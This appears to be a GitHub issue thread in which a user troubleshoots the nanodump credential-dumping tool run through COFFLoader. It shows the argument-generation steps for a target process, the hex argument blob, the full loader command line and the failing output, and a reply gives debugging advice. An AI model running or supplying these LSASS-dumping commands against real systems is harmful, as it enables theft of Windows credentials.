Issues when I run with CoffLoader

Question

Issues when I run with CoffLoader

kaleemshaik7867 opened this issue 7 months ago · comments

Hello Team,
I have tried the nano dump with offloader, and I generated the hex value as below. I have tried both fork and snapshot technique

Beacon Argument Generator
Beacon>addint 660
Beacon>addString test.dmp
Beacon>addint 1
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>generate
b'570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'

Then I ran it with COFFLoader.

COFFLoader64.exe go nanodump.x64.o 570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
Got contents of COFF file
Running/Parsing the COFF file
the --malseclogon-leak-local technique failed!Ran/parsed the coff
Outdata Below:

the --malseclogon-leak-local technique failed!

I could not figure it out what the issue could be

infosec guy · Answer 1 · Thu Feb 08 2024 01:05:27 GMT+0800 (China Standard Time)

Hi there, why don't you compile the object file in debug mode? make debug -f Makefile.mingw
This should give you more information as to why it failed.

kaleemshaik7867 · Answer 2 · Fri Feb 09 2024 11:24:26 GMT+0800 (China Standard Time)

I have used other loader such as https://github.com/airbus-cert/Invoke-Bof/tree/main and worked fine for me.